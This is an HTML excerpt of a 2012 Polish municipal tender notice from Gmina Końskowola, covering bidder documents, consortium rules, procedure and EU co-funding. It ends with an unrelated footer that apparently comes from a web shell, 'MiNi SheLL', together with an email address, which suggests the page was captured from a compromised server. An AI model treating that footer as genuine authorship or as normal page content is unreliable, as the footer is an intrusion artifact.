<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca załączy do oferty:
1)	formularz ofertowy - załącznik nr 1 do SIWZ
2)	oświadczenie o braku podstaw do wykluczenia z postępowania - załącznik nr 2 i 7 do SIWZ
3)	oświadczenie o spełnieniu warunków w postępowaniu - załącznik nr 3 do SIWZ
4)	wykaz wykonanych usług + dokumenty np. referencje potwierdzające należyte wykonanie zamówienia)
- załącznik nr 5 do SIWZ
5) 	wykaz osób uczestniczących w wykonaniu zamówienia - zał. Nr 8 do SIWZ
6)  	aktualny odpis z właściwego rejestru (KRS lub oświadczenie w stosunku do osoby fizycznej o braku podstaw do wykluczenia),
7) 	informacje z banku lub kasy oszczędnościowo-kredytowej,
8)	dowód wniesienia wadium.

3.	Zasady udziału w postępowaniu Wykonawców występujących wspólnie
3.1.		Oferta wspólna
W przypadku, kiedy ofertę składa kilka podmiotów, oferta musi spełniać następujące warunki: 

1)	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)	Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela pełnomocnika (partnera wiodącego).
3)	Upoważnienie do pełnienia funkcji przedstawiciela pełnomocnika (partnera wiodącego) wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy je  załączyć je do oferty.
Pełnomocnik przedstawiciel (wiodący partner) winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy załączyć oświadczenie.
4)	Zamawiający będzie żądać od Wykonawcy, którego oferta została wybrana jako najkorzystniejszą w przedmiotowym postępowaniu kopii umowy lub innego dokumentu potwierdzającego zawarcie umowy przez Wykonawców składających ofertę wspólnie lub konsorcjum/spółki cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki została zawarta umowa konsorcjum, nie może być krótszy niż termin realizacji zamówienia.

Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.


3.2.		Wykonawcy, o których mowa w pkt. 3 składają jedną ofertę, przy czym:

a)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ) i wykaz wykonanych usług (załącznik nr 5 do SIWZ) i wykaz osób uczestniczących w wykonaniu zamówienia (załącznik nr 8 do SIWZ), informacje z banku lub kasy oszczędnościowo-kredytowej - składa przynajmniej jeden Wykonawca, który jest zdolny do udokumentowania, że spełnia warunki lub każdy z Wykonawców składających ofertę wspólnie, warunki te muszą zostać spełnione przez Wykonawców łącznie.

b)	oświadczenie o braku podstaw do wykluczenia z postępowania z art. 24. ust. 1 ustawy Pzp (załącznik nr 2 i 7 do SIWZ) i aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru - składa osobno każdy z Wykonawców.
	Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.
Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia, nie spełnia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności. 
Zgodnie z art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty gdy wystąpi którekolwiek z poniższych zdarzeń:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację zamówienia; 
2)	zaistnieją zdarzenia o charakterze siły wyższej niezależnie od stron umowy, które uniemożliwiłyby terminowe wykonanie zamówienia. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu umowy. 
3)	za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć, w szczególności siłą wyższą będzie działanie sił przyrody, jak huragan, powódź, zamieć lub zgon Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.konskowola.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Końskowola
ul. Pożowska 3A 
24-130 Końskowola 
(sekretariat), poniedziałek - piątek, w godz. od 7:00 do 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2012 godzina 12:00, miejsce: Gmina Końskowola
ul. Pożowska 3A 
24-130 Końskowola 
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: LUBKON - program zwiększania konkurencyjności 
przedsiębiorstw z województwa lubelskiego, jest 
 współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki,
Poddziałanie 8.1.1. Wspieranie rozwoju kwalifikacji zawodowych 
i doradztwo dla przedsiębiorstw.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com